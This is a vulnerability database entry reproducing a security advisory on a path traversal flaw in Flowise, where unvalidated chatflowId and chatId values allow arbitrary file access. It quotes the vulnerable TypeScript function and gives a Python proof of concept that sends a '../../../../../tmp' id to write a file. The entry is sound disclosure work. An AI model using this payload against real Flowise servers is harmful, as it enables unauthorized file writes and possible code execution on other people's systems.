| Vulnerability ID | VCID-prvx-mjqx-fuew |
| Aliases | GHSA-q67q-549q-p849 |
| Summary | Flowise has arbitrary file access due to missing chat flow id validation |
| Status | Published |
| Exploitability | None |
| Weighted Severity | None |
| Risk | None |
| Affected and Fixed Packages | Package Details |

### Summary

Missing chat flow id validation allows an attacker to access arbitrary files.

### Details

Commits https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f and https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 added a check on `filename` when handling file upload operations to prevent path traversal, and additional validation of `chatflowId` and `chatId` on the `/api/v1/attachments` route. In some cases, however, `chatflowId` and `chatId` are not validated to ensure they are UUIDs or numbers, which may lead to security issues.

**Case 1**

When creating a new chatflow via `/api/v1/chatflows`, the function `addBase64FilesToStorage` is called if base64 file data is present. Although the `filename` is sanitized, the `chatflowid` comes directly from the request body without any validation. An attacker could exploit the path traversal here to write an arbitrary file with controlled data.

```typescript
export const addBase64FilesToStorage = async (fileBase64: string, chatflowid: string, fileNames: string[]) => {
    // ...
    } else {
        const dir = path.join(getStoragePath(), chatflowid) // path traversal here
        if (!fs.existsSync(dir)) {
            fs.mkdirSync(dir, { recursive: true })
        }
        const splitDataURI = fileBase64.split(',')
        const filename = splitDataURI.pop()?.split(':')[1] ?? ''
        const bf = Buffer.from(splitDataURI.pop() || '', 'base64')
        const sanitizedFilename = _sanitizeFilename(filename)
        const filePath = path.join(dir, sanitizedFilename)
        fs.writeFileSync(filePath, bf)
        fileNames.push(sanitizedFilename)
        return 'FILE-STORAGE::' + JSON.stringify(fileNames)
    }
}
```

**Case 2**

When downloading a file via `/api/v1/openai-assistants-file/download` or `/api/v1/get-upload-file`, the function `streamStorageFile` is called to retrieve file data from local storage or a cloud bucket. The `chatflowId` and `chatId` are used to generate the file path. Taking Amazon S3 as an example, its [documentation indicates](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines) that `../` will be treated as a relative path. Note that these APIs are in `WHITELIST_URLS`, so an attacker may traverse user storage files without authentication.

### PoC

Launch the app at localhost with the default config, then run the following Python script; a file named `pwn` will be written to the directory `/tmp` with content `Hello, World!`.

```python
import requests
import json

url = "http://localhost:8080/api/v1/chatflows"
headers = {"x-request-from": "internal"}
nodedata = {
    "category": "Document Loaders",
    "inputs": {"key": "data:text/plain;base64,SGVsbG8sIFdvcmxkIQ==,a:pwn"},
}
flownode = {"id": "a", "data": nodedata}
flowdata = {"nodes": [flownode], "edges": [], "viewport": {"x": 1, "y": 1, "zoom": 1}}
data = {"id": "../../../../../tmp", "name": "name", "flowData": json.dumps(flowdata)}
res = requests.post(url, json=data, headers=headers)
```

### Impact

1. Arbitrary file read / write
2. Remote Code Execution
3. Data loss
| System | Score | Found at |
|---|---|---|
| cvssv3.1 | 9.8 | https://github.com/FlowiseAI/Flowise |
| generic_textual | CRITICAL | https://github.com/FlowiseAI/Flowise |
| cvssv3.1 | 9.8 | https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f |
| generic_textual | CRITICAL | https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f |
| cvssv3.1 | 9.8 | https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 |
| generic_textual | CRITICAL | https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 |
| cvssv3.1 | 9.8 | https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849 |
| generic_textual | CRITICAL | https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-q67q-549q-p849 |
No EPSS data available for this vulnerability.
| Date | Actor | Action | Source | VulnerableCode Version |
|---|---|---|---|---|
| 2026-06-04T17:08:28.323895+00:00 | GithubOSV Importer | Import | https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/09/GHSA-q67q-549q-p849/GHSA-q67q-549q-p849.json | 38.6.0 |